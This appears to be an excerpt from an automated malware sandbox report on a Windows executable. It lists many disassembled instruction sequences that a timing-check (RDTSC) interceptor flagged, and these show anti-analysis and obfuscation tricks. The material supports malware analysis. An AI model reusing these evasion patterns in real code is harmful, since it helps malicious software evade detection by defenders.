                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA4C1D second address: BA4CA0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FEB1C7EA9D8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov esi, 5729860Fh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FEB1C7EA9D8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007FEB1C7EA9D8h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 and si, E914h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA4CA0 second address: BA4CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAE659 second address: BAE66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAE66B second address: BAE671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAE671 second address: BAE675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAE675 second address: BAE694 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007FEB1CC19F7Ch 0x00000010 pushad 0x00000011 jno 00007FEB1CC19F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAE694 second address: BAE6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or bx, 8D4Fh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FEB1C7EA9D8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push ebx 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FEB1C7EA9D8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FEB1C7EA9E2h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA3EAE second address: BA3EEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007FEB1CC19F89h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEB1CC19F83h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA49E2 second address: BA49E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB254F second address: BB2553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB3599 second address: BB35A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FEB1C7EA9D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAA7C8 second address: BAA7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FEB1CC19F76h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jno 00007FEB1CC19F76h 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8B6 second address: BAC8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAD935 second address: BAD944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAF822 second address: BAF831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 jng 00007FEB1C7EA9DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8BC second address: BAC8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAD944 second address: BAD948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB4585 second address: BB458B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB078F second address: BB084E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FEB1C7EA9D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FEB1C7EA9D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jno 00007FEB1C7EA9DCh 0x0000002f push dword ptr fs:[00000000h] 0x00000036 sub edi, dword ptr [ebp+122D203Bh] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jmp 00007FEB1C7EA9DCh 0x00000048 mov eax, dword ptr [ebp+122D0AFDh] 0x0000004e call 00007FEB1C7EA9DEh 0x00000053 push ecx 0x00000054 xor bx, 3400h 0x00000059 pop ebx 0x0000005a pop ebx 0x0000005b jmp 00007FEB1C7EA9DFh 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push esi 0x00000065 call 00007FEB1C7EA9D8h 0x0000006a pop esi 0x0000006b mov dword ptr [esp+04h], esi 0x0000006f add dword ptr [esp+04h], 00000018h 0x00000077 inc esi 0x00000078 push esi 0x00000079 ret 0x0000007a pop esi 0x0000007b ret 0x0000007c jmp 00007FEB1C7EA9E0h 0x00000081 push eax 0x00000082 pushad 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAF831 second address: BAF83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FEB1CC19F76h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8C0 second address: BAC8E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAD948 second address: BAD94E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB084E second address: BB0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9DBh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8E5 second address: BAC8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAF83D second address: BAF8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or dword ptr [ebp+1244FA5Eh], edx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov di, ax 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FEB1C7EA9D8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr [ebp+12458033h], ecx 0x0000003f mov eax, dword ptr [ebp+122D0B09h] 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FEB1C7EA9D8h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f jmp 00007FEB1C7EA9DCh 0x00000064 push FFFFFFFFh 0x00000066 jnc 00007FEB1C7EA9DAh 0x0000006c nop 0x0000006d pushad 0x0000006e pushad 0x0000006f pushad 0x00000070 popad 0x00000071 jng 00007FEB1C7EA9D6h 0x00000077 popad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b pop eax 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB3747 second address: BB374C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BAC8E9 second address: BAC8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB1881 second address: BB1888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB55DF second address: BB567F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, F36Ch 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov di, dx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FEB1C7EA9D8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jc 00007FEB1C7EA9DCh 0x00000042 xor dword ptr [ebp+122D1954h], eax 0x00000048 mov ebx, dword ptr [ebp+12445D6Ah] 0x0000004e mov eax, dword ptr [ebp+122D0629h] 0x00000054 sub ebx, 787403E4h 0x0000005a add edi, dword ptr [ebp+122D37BCh] 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push ebx 0x00000065 call 00007FEB1C7EA9D8h 0x0000006a pop ebx 0x0000006b mov dword ptr [esp+04h], ebx 0x0000006f add dword ptr [esp+04h], 00000019h 0x00000077 inc ebx 0x00000078 push ebx 0x00000079 ret 0x0000007a pop ebx 0x0000007b ret 0x0000007c nop 0x0000007d jmp 00007FEB1C7EA9E1h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB567F second address: BB5683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB5683 second address: BB5687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7503 second address: BB7507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB5687 second address: BB568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7507 second address: BB750D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB750D second address: BB7513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7513 second address: BB7566 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007FEB1CC19F78h 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007FEB1CC19F7Ch 0x00000018 popad 0x00000019 nop 0x0000001a cmc 0x0000001b mov dword ptr [ebp+122D2372h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FEB1CC19F78h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d push 00000000h 0x0000003f movzx ebx, dx 0x00000042 push eax 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB7566 second address: BB756A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB756A second address: BB756E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB76E1 second address: BB76E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BB76E5 second address: BB76F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jns 00007FEB1CC19F76h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE95 second address: BBBE99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE99 second address: BBBE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBBE9F second address: BBBEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FEB1C7EA9DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BBED7E second address: BBED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B5D13C second address: B5D140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2542 second address: BC2550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2550 second address: BC256D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEB1C7EA9D6h 0x0000000e jmp 00007FEB1C7EA9DFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC256D second address: BC257B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FEB1CC19F76h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC26E4 second address: BC26F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jc 00007FEB1C7EA9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC2986 second address: BC298A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC298A second address: BC29A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEB1C7EA9D6h 0x00000008 jnp 00007FEB1C7EA9D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007FEB1C7EA9DCh 0x00000016 jno 00007FEB1C7EA9D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC29A6 second address: BC29AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC29AD second address: BC29ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9E7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FEB1C7EA9DCh 0x00000014 pushad 0x00000015 jg 00007FEB1C7EA9D6h 0x0000001b jl 00007FEB1C7EA9D6h 0x00000021 jno 00007FEB1C7EA9D6h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC5EDE second address: BC5EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FEB1CC19F76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BC5EF9 second address: BC5EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC13C second address: BCC154 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2C3 second address: BCC2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2C7 second address: BCC2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC2CD second address: BCC2D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC59F second address: BCC5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC717 second address: BCC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E2h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FEB1C7EA9E8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCC74B second address: BCC752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BCCBBE second address: BCCBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1C7EA9E9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD0791 second address: BD0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AA1 second address: BD5AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AA9 second address: BD5AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5AAD second address: BD5ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5ABE second address: BD5AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5C3D second address: BD5C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5C41 second address: BD5C4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60AA second address: BD60BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 ja 00007FEB1C7EA9F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60BA second address: BD60CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FEB1CC19F76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD60CC second address: BD60D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6236 second address: BD6244 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEB1CC19F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5788 second address: BD5795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
